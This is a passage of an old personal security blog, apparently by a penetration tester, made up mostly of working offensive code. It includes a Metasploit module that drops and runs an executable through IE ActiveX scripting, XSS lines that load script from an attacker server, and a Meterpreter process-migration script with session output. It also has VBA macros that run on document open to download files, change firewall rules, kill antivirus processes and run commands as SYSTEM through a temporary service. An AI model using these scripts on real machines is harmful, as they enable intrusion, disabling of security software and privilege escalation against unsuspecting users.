and delete the created entries<br /> setTimeout('WshShell.RegDelete(regIntranet + "1001")', 60000);<br /> setTimeout('WshShell.RegDelete(regIntranet + "1004")', 60000);<br /> setTimeout('WshShell.RegDelete(regIntranet + "1200")', 60000);<br /> setTimeout('WshShell.RegDelete(regIntranet + "1201")', 60000);<br /> setTimeout('WshShell.RegDelete(regIntranet + "1208")', 60000);<br /> setTimeout('WshShell.RegDelete(regRange)', 60000);<br /><br /> WshShell.Run("iexplore.exe -new http://#{datastore['PXHOST']}:#{datastore['PXPORT']}#{datastore['PXURI']}",0,false);<br />}<br /></script><br /></html>^<br /></code></pre><br /><br /><b>ie_unsafe_scripting metasploit module</b> (Nathan Keltner, 2009-01-27)<br /><br />Update: This module now works as a standalone HTTP or javascript include. Also, we pushed this to SVN on 2/27/09.<br /><br />This one's not in the <a href="http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/">svn tree</a> yet; I'll update this post if it gets pulled in. I've had a couple of requests for it, so I thought I would go ahead and drop it here.<br /><br />It's meant to be used on intranet XSS in environments that have the "Initialize and script ActiveX controls not marked as safe for scripting" set to "enabled". I've run into a few such environments set this way for compatibility with intranet web apps. Rather than turning it on for only those specific sites (or, ummm, fixing the sites), they grant it for the entire intranet.<br /><br />Intranet XSS is all over the place. 
Even the rock-dumb scanners like nikto will pick up dozens on a normal internal penetration test.<br /><br />Next steps: create a fast XSS scanner written in javascript to automatically exploit this stuff over the internet!<br /><br /><br />For use like so:<br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>http://vulnerable-server/vulnerable_web_app.asp?var="><script src=http://attacker-msf-server.com/ie_unsafe_scripting.js></script><br /></code></pre>Or, if you are actually sitting on the intranet and can get people to hit http://server/msf.htm:<br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code><html><head></head><body><br /><script src=http://msf-server/ie_unsafe_scripting.js><br /></script></body></html></code></pre><br /><b>Explanation of how it works</b><br /><br />This works because this security setting grants access to the WScript ActiveX control from scripting languages in Internet Explorer (Javascript and VBScript). With this control you can (among other things):<br /><ul><li>Execute commands similar to a shell prompt (except you get to run these silently, without notifying the user) through WScript.Shell<br /></li><li>Create/delete/modify text files through WScript.FileSystemObject<br /></li></ul>Unfortunately, it does not allow you to directly write binary files to the file system. 
(You <i><b>can</b></i> use WScript.FileSystemObject to create a 'text' file that contains binary data, but <a href="http://blogs.msdn.com/ericlippert/comments/410127.aspx">this will only work if you are in an ANSI / ASCII-based version of Windows</a>, such as us in the USA. If you're in Japan, it apparently epicfails. No promises mine won't do the same thing, even though I've tried to work around it.)<br /><br />As a result, when you want to write a binary file to disk you use the ADODB.Stream ActiveX control. Unfortunately for bad guys and pentesters, IE7 put in a new security control called "Access data sources across domains", which now by default is set to prompt the user if they want to allow your script to talk to other 'domains'. (Windows / IE treats the filesystem as a different 'domain', and therefore you can't read/write to it if your code was loaded from http://intranet/.)<br /><br />But I can write text files and I can execute commands? Well, then I can write a script file directly to disk and then execute it, getting around the extra IE7 permissions!<br /><br />This module pushes javascript that instantiates the WScript.FileSystemObject, writes a vbscript file to the %TEMP% directory, executes the script with WScript.Shell, and deletes it. The vbscript:<br /><ul><li>has a metasploit executable payload stored inside a really big hex block, which is converted to an ANSI character array once the script runs</li><li>converts the character array into a binary array using some ADODB.Stream trickery (ADODB.Stream won't accept an ANSI character array as input to write a binary file; it'll give you a type error.)</li><li>feeds the converted binary array to ADODB.Stream, which writes it to disk<br /></li></ul><br />There are some things that could be done to minimize the size of the transport, but this is working now so I don't see a lot of reason to slim it down any further. 
This module defaults to using gzip transfer encoding, which will probably make it about as small of a transfer as can easily be made.<br /><br />I randomized a bunch of junk, but I would assume those giant blocks of hex are probably very signatureable for the antivirus guys. If I really care, one day maybe I'll get around to doing some trickery so it encodes/decodes differently every time. For now, here it is:<br /><br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>##<br />#<br />##<br /><br />##<br /># This file is part of the Metasploit Framework and may be subject to<br /># redistribution and commercial restrictions. Please see the Metasploit<br /># Framework web site for more information on licensing and terms of use.<br /># http://metasploit.com/projects/Framework/<br />##<br /><br /><br />require 'msf/core'<br /><br /><br />class Metasploit3 < Msf::Exploit::Remote<br /><br />include Msf::Exploit::Remote::HttpServer::HTML<br /><br />def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Internet Explorer Unsafe Scripting Misconfiguration',<br /> 'Description' => %q{<br /> This exploit takes advantage of the "Initialize and script ActiveX controls not<br /> marked safe for scripting" setting within Internet Explorer. When this option is set,<br /> IE allows access to the WScript.Shell ActiveX control, which allows javascript to<br /> interact with the file system and run commands. This security flaw is not uncommon<br /> in corporate environments for the 'Intranet' or 'Trusted Site' zones. In order to<br /> save binary data to the file system, ADODB.Stream access is required, which in IE7<br /> will trigger a cross domain access violation. 
As such, we write the code to a .vbs<br /> file and execute it from there, where no such restrictions exist.<br /> <br /> When set via domain policy, the most common registry entry to modify is HKLM\<br /> Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1201,<br /> which if set to '0' forces ActiveX controls not marked safe for scripting to be<br /> enabled for the Intranet zone.<br /> <br /> This module creates javascript code meant to be included in a <SCRIPT> tag, such as<br /> http://intranet-server/xss.asp?id="><script%20src=http://10.10.10.10/ie_unsafe_script.js><br /> </script>.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' =><br /> [<br /> 'natron'<br /> ],<br /> 'Version' => '$Revision:$',<br /> 'References' =><br /> [<br /> [ 'MS', 'http://support.microsoft.com/kb/182569' ],<br /> ],<br /> 'Payload' =><br /> {<br /> 'Space' => 4000,<br /> 'StackAdjustment' => -3500,<br /> },<br /> 'Platform' => 'win',<br /> 'Targets' =><br /> [<br /> [ 'Automatic', { } ],<br /><br /> ],<br /> 'DefaultOptions' =><br /> {<br /> 'HTTP::compression' => 'gzip'<br /> },<br /> 'DefaultTarget' => 0))<br />end<br /><br />def on_request_uri(cli, request)<br /><br /> #print_status("Starting...");<br /> # Build out the HTML response page<br /> var_shellobj = rand_text_alpha(rand(5)+5);<br /> var_fsobj = rand_text_alpha(rand(5)+5);<br /> var_fsobj_file = rand_text_alpha(rand(5)+5);<br /> var_vbsname = rand_text_alpha(rand(5)+5);<br /> var_writedir = rand_text_alpha(rand(5)+5);<br /> var_exename = rand_text_alpha(rand(5)+5);<br /> var_origLoc = rand_text_alpha(rand(5)+5);<br /> var_byteArray = rand_text_alpha(rand(5)+5);<br /> var_stream = rand_text_alpha(rand(5)+5);<br /> var_writestream = rand_text_alpha(rand(5)+5);<br /> var_strmConv = rand_text_alpha(rand(5)+5);<br /><br /> p = regenerate_payload(cli);<br /> #print_status("Genning payload...");<br /> exe = Rex::Text.to_win32pe(p.encoded, '');<br /> #print_status("Building vbs file...");<br /> 
# Build the content that will end up in the .vbs file<br /> vbs_content = Rex::Text.to_hex(%Q|Dim #{var_origLoc}, s, #{var_byteArray}<br />#{var_origLoc} = SetLocale(1033)<br />|)<br /><br /> print_status("Encoding payload into vbs/javascript...");<br /> # Drop the exe payload into an ansi string (ansi ensured via SetLocale above)<br /> # for conversion with ADODB.Stream<br /> vbs_content << Rex::Text.to_hex("\ts = s & Chr(CInt(\"&H#{("%.2x" % exe[0]).upcase}\"))\r\n")<br /><br /> 1.upto(exe.length) do |i|<br /> vbs_content << Rex::Text.to_hex("\ts = s & Chr(CInt(\"&H#{("%.2x" % exe[i]).upcase}\"))\r\n")<br /> end<br /><br /> # Continue with the rest of the vbs file;<br /> # Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent<br /> # Then use ADODB.Stream again to write the binary to file.<br /> #print_status("Finishing vbs...");<br /> vbs_content << Rex::Text.to_hex(%Q|<br />Dim #{var_strmConv}, #{var_writedir}, #{var_writestream}<br />#{var_writedir} = WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") & "\\#{var_exename}.exe"<br /><br />Set #{var_strmConv} = CreateObject("ADODB.Stream")<br /><br />#{var_strmConv}.Type = 2<br />#{var_strmConv}.Charset = "x-ansi"<br />#{var_strmConv}.Open<br />#{var_strmConv}.WriteText s, 0<br />#{var_strmConv}.Position = 0<br />#{var_strmConv}.Type = 1<br />#{var_byteArray} = #{var_strmConv}.Read<br /><br />Set #{var_writestream} = CreateObject("ADODB.Stream")<br /><br />#{var_writestream}.Type = 1<br />#{var_writestream}.Open<br />#{var_writestream}.Write #{var_byteArray}<br />#{var_writestream}.SaveToFile #{var_writedir}, 2<br /><br />SetLocale(#{var_origLoc})|)<br /><br /> # Encode the vbs_content<br /> #print_status("Hex encoded vbs_content: #{vbs_content}");<br /><br /> # Build the javascript that will be served<br /> js_content = %Q|var #{var_shellobj} = new ActiveXObject("WScript.Shell");<br />var #{var_fsobj} = new ActiveXObject("Scripting.FileSystemObject");<br />var 
#{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings("%TEMP%");<br />var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs",2,true);<br /><br />#{var_fsobj_file}.Write(unescape("#{vbs_content}"));<br />#{var_fsobj_file}.Close();<br /><br />#{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true);<br />#{var_shellobj}.run(#{var_writedir} + "\\\\" + "#{var_exename}.exe", 0, false);<br />#{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs");<br />|<br /><br /> print_status("Sending exploit javascript to #{cli.peerhost}:#{cli.peerport}...");<br /> print_status("Exe will be #{var_exename}.exe and must be manually removed from the %TEMP% directory on the target.");<br /><br /> # Transmit the response to the client<br /> send_response(cli, js_content, { 'Content-Type' => 'text/javascript' })<br /><br /> # Handle the payload<br /> handler(cli) <br />end<br />end<br /></code></pre><br /><br /><b>Default IE7 Settings for XP SP3 and Server 2003 SP1</b> (Nathan Keltner, 2008-12-17)<br /><br />In doing some research on IE7 permissions I searched high and low on the MSDN and similar places, and couldn't find a complete list of default settings. So, I created the following spreadsheet to document what was available, by default, for the various security zones ('Intranet', 'Internet', etc). This was a quick analysis and only includes those with 'simple' registry values (like 0, 1, etc), and doesn't parse out any of the more complex values. See <a href="http://support.microsoft.com/kb/182569">this MS link</a> for more info.<br /><br />When I created it, I looked at a fresh XP SP3 install and an almost new Server 2003 SP1 install. I followed the rules for precedence when conflicting rules are in place (e.g. 
HKLM vs HKCU, Domain policy over default HKLM/HKCU, etc) and came up with the final results. At some point, I'll go back and do it properly with complete documentation of the sources of the various settings, but in the meantime if anyone else would find this useful, here ya go.<br /><br />Specifically, the settings that may be interesting to look at are:<br /><br /><ul><li>1206 Miscellaneous: Allow scripting of Internet Explorer Web browser control ^</li><li>1208 ActiveX controls and plug-ins: Allow previously unused ActiveX controls to run without prompt ^</li><li>1209 ActiveX controls and plug-ins: Allow Scriptlets</li><li>1407 Scripting: Allow Programmatic clipboard access</li><li>1607 Miscellaneous: Navigate sub-frames across different domains</li><li>1805 Launching programs and files in webview #</li><li>1806 Miscellaneous: Launching applications and unsafe files</li><li>1809 Miscellaneous: Use Pop-up Blocker ** ^</li><li>1A04 Miscellaneous: Don't prompt for client certificate selection when no certificates or only one certificate exists * ^</li><li>1A05 Allow 3rd party persistent cookies *</li><li>1A10 Privacy Settings *</li><li>2102 Miscellaneous: Allow script initiated windows without size or position constraints ** ^</li><li>2103 Scripting: Allow status bar updates via script ^</li><li>2104 Miscellaneous: Allow websites to open windows without address or status bars ^</li><li>2105 Scripting: Allow websites to prompt for information using scripted windows ^</li><li>2200 Downloads: Automatic prompting for file downloads ** ^</li><li>2201 ActiveX controls and plug-ins: Automatic prompting for ActiveX controls ** ^</li><li>2301 Miscellaneous: Use Phishing Filter ^</li><li>1207 Reserved #</li><li>1408 Reserved #</li><li>1807 Reserved ** #</li><li>180A Reserved #</li><li>180D Reserved #</li></ul><br />Lastly, if any of you who review this notice your settings are different from these, please drop me an email.<br /><br />The default IE7 settings are located at 
the below registry entries. If policy-enforced settings are in place, they override whatever is set here.<br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings<br />HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings<br /></code></pre><br /><a href="http://spreadsheets.google.com/ccc?key=pPb4M5mLTAttAB-flW0VIaw">Default Windows IE7 Permissions</a><br /><br /><br /><b>Automatic migration to a new process with meterpreter</b> (Nathan Keltner, 2008-12-12)<br /><br />Playing with <a href=http://www.metasploit.com>metasploit</a>'s <a href=http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4844>new</a> <a href=http://www.breakingpointsystems.com/community/blog/patch-tuesdays-and-drive-by-sundays>ie_xml_corruption</a> <a href=http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/ie_xml_corruption.rb>module</a>, I needed a way to automatically migrate outside of the current process (iexplore.exe). This particular exploit locks up the process upon exploitation, leaving the user sitting at a hung Internet Explorer. Should a user ctrl+alt+delete and terminate it, I didn't want to lose the session. <br /><br />An <a href=http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/migrate.rb>example migrate script</a> exists that will do some of this, but if you use it in its default form, it migrates to lsass.exe. 
If meterpreter then crashes (or you close it), it'll kill the whole process... which you certainly don't want to do with lsass. Also, my little script has the added benefit of working even if the exploited user doesn't have admin privileges (and LSASS migration would then be impossible).<br /><br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>msf exploit(ie_xml_corruption) > exploit<br />[*] Exploit running as background job.<br />[*] Handler binding to LHOST 192.168.182.1<br />[*] Started reverse handler<br />[*] Using URL: http://192.168.182.1:80/ie-xml-corruption.html<br />[*] Server started.<br />[*] Sending HTML to 192.168.182.1:2761...<br />[*] Sending DLL to 192.168.182.1:2761...<br />[*] Transmitting intermediate stager for over-sized stage...(191 bytes)<br />[*] Sending stage (75776 bytes)<br />[*] Meterpreter session 5 opened (192.168.182.1:4444 -> 192.168.182.1:2762)<br />msf exploit(ie_xml_corruption) > sessions -i 5<br />[*] Starting interaction with 5...<br /><br />run launch_and_migrate<br />[*] Launching hidden cmd.exe...<br />[*] Process 5560 created.<br />[*] Current process is IEXPLORE.EXE (656). Migrating to 5560.<br />[*] Migration completed successfully.<br />[*] New server process: cmd.exe (5560)<br />[*] Old process 656 killed.<br /></code></pre><br /><br />Save the file to .msf3/scripts/meterpreter/ (may need to create the subdirectories) and it'll become available to your meterpreter sessions. 
You should be able to set the script to <a href=http://trac.metasploit.com/wiki/AutomatingMeterpreter>automatically run</a> with the advanced AutoRunScript option:<br /><br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>Payload advanced options (windows/reflectivemeterpreter/reverse_tcp):<br /><br /> Name : AutoLoadStdapi<br /> Current Setting: true<br /> Description : Automatically load the Stdapi extension<br /><br /> Name : AutoRunScript<br /> Current Setting: <br /> Description : Script to autorun on meterpreter session creation<br /></code></pre><br /><br />... but I couldn't get it to work in the few minutes I had to play with it. It may be broken on Windows, or I just may not be able to figure out how to do paths in Windows + Ruby. I'll check with my linux install over the weekend.<br /><br />And here's the code:<br /><br /><a href=http://sites.google.com/a/invisibledenizen.org/upload/asdf/launch_and_migrate.rb>launch_and_migrate.rb</a><br /><br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>##<br />## Meterpreter script that launches a hidden process, <br />## migrates to it, then kills the old process.<br />##<br />## Provided by natron (natron 0x40 invisibledenizen 0x2E com)<br />##<br /><br /># Get the target process name<br />target = args[0] || "cmd.exe"<br /><br />def launchProc(target)<br /> print_status("Launching hidden #{target}...")<br /><br /> # Set the vars; these can of course be modified if need be<br /> cmd_exec = target<br /> cmd_args = nil<br /> hidden = true<br /> channelized = nil<br /> use_thread_token = false<br /><br /> # Launch new process<br /> newproc = 
client.sys.process.execute(cmd_exec, cmd_args, <br /> 'Channelized' => channelized,<br /> 'Hidden' => hidden,<br /> 'InMemory' => nil,<br /> 'UseThreadToken' => use_thread_token)<br /><br /> print_status("Process #{newproc.pid} created.")<br /> <br /> return newproc<br />end<br /><br />def migrateToProc(newproc)<br /> # Grab the current pid info<br /> server = client.sys.process.open<br /> print_status("Current process is #{server.name} (#{server.pid}). Migrating to #{newproc.pid}.")<br /> <br /> # Save the old process info so we can kill it after migration.<br /> oldproc = server.pid<br /> <br /> # Do the migration<br /> client.core.migrate(newproc.pid.to_i)<br /><br /> print_status("Migration completed successfully.")<br /><br /> # Grab new process info<br /> server = client.sys.process.open<br /><br /> print_status("New server process: #{server.name} (#{server.pid})")<br /> <br /> return oldproc<br />end<br /><br />def killApp(procpid)<br /> client.sys.process.kill(procpid)<br /> print_status("Old process #{procpid} killed.")<br />end<br /><br /># Main flow of execution<br />newProcPid = launchProc(target)<br />oldProc = migrateToProc(newProcPid)<br />killApp(oldProc)<br /></code></pre><br /><br /><b>< PRE > tags suck.</b> (Nathan Keltner, 2008-11-16)<br /><br />Apparently the < PRE > tag kills blogger's ability to do wordwrapping. Awesome. Someone with better blogging skills than I: what's the solution?<br /><br /><br /><b>Modifying Windows Firewall Rules from VBA</b> (Nathan Keltner, 2008-11-16)<br /><br />You can also modify the Microsoft Windows firewall from within VBA using the HNetCfg.FwMgr object. 
Versions of these scripts are available on MSDN.<br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>Function Add_App_To_Firewall(program_name, program_executable, program_scope)<br /> <br /> Const NET_FW_PROFILE_DOMAIN = 0<br /> Const NET_FW_PROFILE_STANDARD = 1<br /><br /> Const NET_FW_SCOPE_ALL_NAME = "All subnets"<br /> Const NET_FW_SCOPE_LOCAL_SUBNET_NAME = "Local subnet only"<br /> <br /> Const NET_FW_IP_VERSION_ANY = 2<br /> <br /> ' Create the firewall manager object.<br /> Dim fwMgr<br /> Set fwMgr = CreateObject("HNetCfg.FwMgr")<br /><br /> ' Get the current profile for the local firewall policy.<br /> Dim profile<br /> Set profile = fwMgr.LocalPolicy.CurrentProfile<br /> <br /> Dim app<br /> Set app = CreateObject("HNetCfg.FwAuthorizedApplication")<br /><br /> app.ProcessImageFileName = program_executable<br /> app.Name = program_name<br /> app.Scope = program_scope<br /> <br /> app.IpVersion = NET_FW_IP_VERSION_ANY<br /> app.Enabled = True<br /><br /> On Error Resume Next<br /> profile.AuthorizedApplications.Add app<br /><br />End Function<br /><br />Function Remove_App_From_Firewall(program_executable)<br /><br /> On Error Resume Next<br /><br /> ' Create the firewall manager object.<br /> Dim fwMgr<br /> Set fwMgr = CreateObject("HNetCfg.FwMgr")<br /> <br /> ' Get the current profile for the firewall<br /> Dim fwPolicy<br /> Set fwPolicy = fwMgr.LocalPolicy.CurrentProfile<br /> <br /> ' Get the Auth Applications object so we can modify<br /> Dim colApplications<br /> Set colApplications = fwPolicy.AuthorizedApplications<br /> <br /> colApplications.Remove program_executable<br /><br />End Function<br /></code></pre><br />As an example, here are the commands that will download the Tiny Web Server from the internet, unzip it, add it to the allowed exceptions list for the 
Windows FW, create a quick .html file, start the server, run Internet Explorer pointed to this server, then kill the server, remove the firewall rule, and delete all of the files.<br /><br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>Sub Workbook_Open()<br /> 'Download tiny web server to the %TEMP% directory, use local copy of winzip to unzip<br /> 'Obviously in a real world application you'd want to bring your own unzipper<br /> Download_File "http://www.ritlabs.com/download/tinyweb/tinyweb.zip", Environ("TEMP") &amp; "\tinyweb.zip"<br /> Run_Program "winzip", "-e -o %TEMP%\tinyweb.zip %TEMP%", INVISIBLE, WAIT<br /> <br /> Const NET_FW_SCOPE_ALL = 0, NET_FW_SCOPE_LOCAL_SUBNET = 1, NET_FW_SCOPE_CUSTOM = 2<br /> Add_App_To_Firewall "tiny-local", Environ("TEMP") &amp; "\tiny.exe", NET_FW_SCOPE_LOCAL_SUBNET<br /> <br /> Run_Cmd "echo iexplore-pwned > %TEMP%\index.html", INVISIBLE, WAIT<br /> <br /> Run_Program "%TEMP%\tiny.exe", "%TEMP% 12345", INVISIBLE, NOWAIT<br /> <br /> ' "Sleep" for a couple of seconds to allow tiny.exe to load<br /> Run_Cmd "ping -n 2 127.0.0.1", INVISIBLE, WAIT<br /> <br /> Run_Program "iexplore", "http://127.0.0.1:12345", VISIBLE, WAIT<br /> <br /> Run_Cmd "taskkill /F /IM tiny.exe", INVISIBLE, WAIT<br /> <br /> Remove_App_From_Firewall Environ("TEMP") &amp; "\tiny.exe"<br /> <br /> On Error Resume Next<br /> Kill Environ("TEMP") &amp; "\tinyweb.zip"<br /> Kill Environ("TEMP") &amp; "\SRC.zip"<br /> Kill Environ("TEMP") &amp; "\LICENSE.txt"<br /> Kill Environ("TEMP") &amp; "\File_id.diz"<br /> Kill Environ("TEMP") &amp; "\Readme.txt"<br /> Kill Environ("TEMP") &amp; "\Cgitest.zip"<br /> Kill Environ("TEMP") &amp; "\index.html"<br /> Kill Environ("TEMP") &amp; "\tiny.exe"<br /><br />End Sub<br /></code></pre><br /><br /><b>How to Kill Antivirus from Word or Excel VBA</b> (Nathan Keltner, 2008-11-16)<br /><br />Building off of the previous posts and functions, here's how to kill off antivirus from within a VBA Macro in Excel or Word (I stole this list from the <a href="http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/killav.rb">meterpreter script</a>):<br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>Function Build_Cmd_List(arrayCmds, command)<br /> <br /> If arrayCmds(0) <> "" Then<br /> ReDim Preserve arrayCmds(UBound(arrayCmds) + 1) As String<br /> End If<br /> <br /> arrayCmds(UBound(arrayCmds)) = command<br /> <br />End Function<br /><br />Function Kill_AV()<br /><br /> Dim arrayCmds() As String<br /> ReDim arrayCmds(0) As String<br /> On Error Resume Next<br /><br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""_avp32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""_avpcc.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""_avpm.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ackwin32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""adaware.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""advxdwin.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""agentsvr.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""agentw.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""alertsvc.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""alevir.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""alogserv.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""amon9x.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""anti-trojan.exe"""<br /> Build_Cmd_List 
""wininit.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wininitx.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""winlogin.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""winmain.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""winnet.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""winppr32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""winrecon.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""winservn.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""winssk32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""winstart.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""winstart001.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wintsk32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""winupdate.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wkufind.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wnad.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wnt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wradmin.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wrctrl.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wsbgate.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wupdater.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wupdt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wyvernworksfirewall.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""xpf202en.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""zapro.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""zapsetup3001.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""zatutor.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""zonalm2601.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""zonealarm.exe"""<br /> <br /> Run_Sys_Cmds arrayCmds, INVISIBLE, WAIT<br />End Function<br /></code></pre><br /><br />Call it with a simple:<br /><pre style="font-family: Andale Mono, Lucida 
Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>Sub Workbook_Open()<br /> Kill_AV<br />End Sub<br /></code></pre>Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com4tag:blogger.com,1999:blog-8542235839869152787.post-15811736606135745762008-11-16T18:16:00.001-08:002008-12-12T14:59:35.431-08:00Running commands as SYSTEM from VBA in Word or ExcelSometimes it is useful to run commands with SYSTEM-level privileges because, for some reason, simply having Administrator won't allow you to do something you need. I often run into this when trying to kill antivirus processes or similar, as they usually require some sort of password to shut them off. If you kill it from under the SYSTEM account, however, it'll shut off without any problems:<br /><br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>Function Run_Sys_Cmds(arrayCmds As Variant, visibility, wait_on_execute)<br /><br /> Set fso = CreateObject("Scripting.FileSystemObject")<br /> Set systemCmd = fso.CreateTextFile(Environ("TEMP") & "\systemCmd.vbs")<br /> Set batchRun = fso.CreateTextFile(Environ("TEMP") & "\systemBatch.bat")<br /> <br /> systemCmd.WriteLine ("CreateObject(""Wscript.Shell"").Run """ & Environ("TEMP") & "\systemBatch.bat" & """, " & visibility & ", " & wait_on_execute)<br /> <br /> For Each cmd In arrayCmds<br /> batchRun.WriteLine (cmd)<br /> Next cmd<br /> <br /> systemCmd.Close<br /> batchRun.Close<br /> <br /> Run_Cmd "sc create systemCmd binpath= ""%COMSPEC% /c wscript %TEMP%\systemCmd.vbs "" type= own type= interact", INVISIBLE, WAIT<br /> Run_Cmd "sc start systemCmd", INVISIBLE, WAIT<br /> Run_Cmd "sc delete systemCmd", INVISIBLE, WAIT<br /> Kill 
Environ("TEMP") & "\systemCmd.vbs"<br /> Kill Environ("TEMP") & "\systemBatch.bat"<br /><br />End Function<br /></code></pre><br />This version only accepts an array of commands to be processed. I found that it was way too slow to process a large number of commands unless you did it this way. It would be simple to modify it to accept a plain String instead if you want to use it for one-off commands.<br /><br />You'd call this with something like:<br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code> Dim syscmd(1) As String<br /> syscmd(0) = "set && pause"<br /> syscmd(1) = "ping 127.0.0.1"<br /> Run_Sys_Cmds syscmd, VISIBLE, WAIT<br /></code></pre><br />It executes commands at the SYSTEM level by creating a service that will run your command for you. A service created with sc create runs as LocalSystem unless you pass obj= to name another account, so the batch file inherits SYSTEM. Creating services is only possible if you have Administrator-level privileges on the system, so I really only find this useful to get around locked files or antivirus.<br /><br />It's on my TO DO list to play with <a 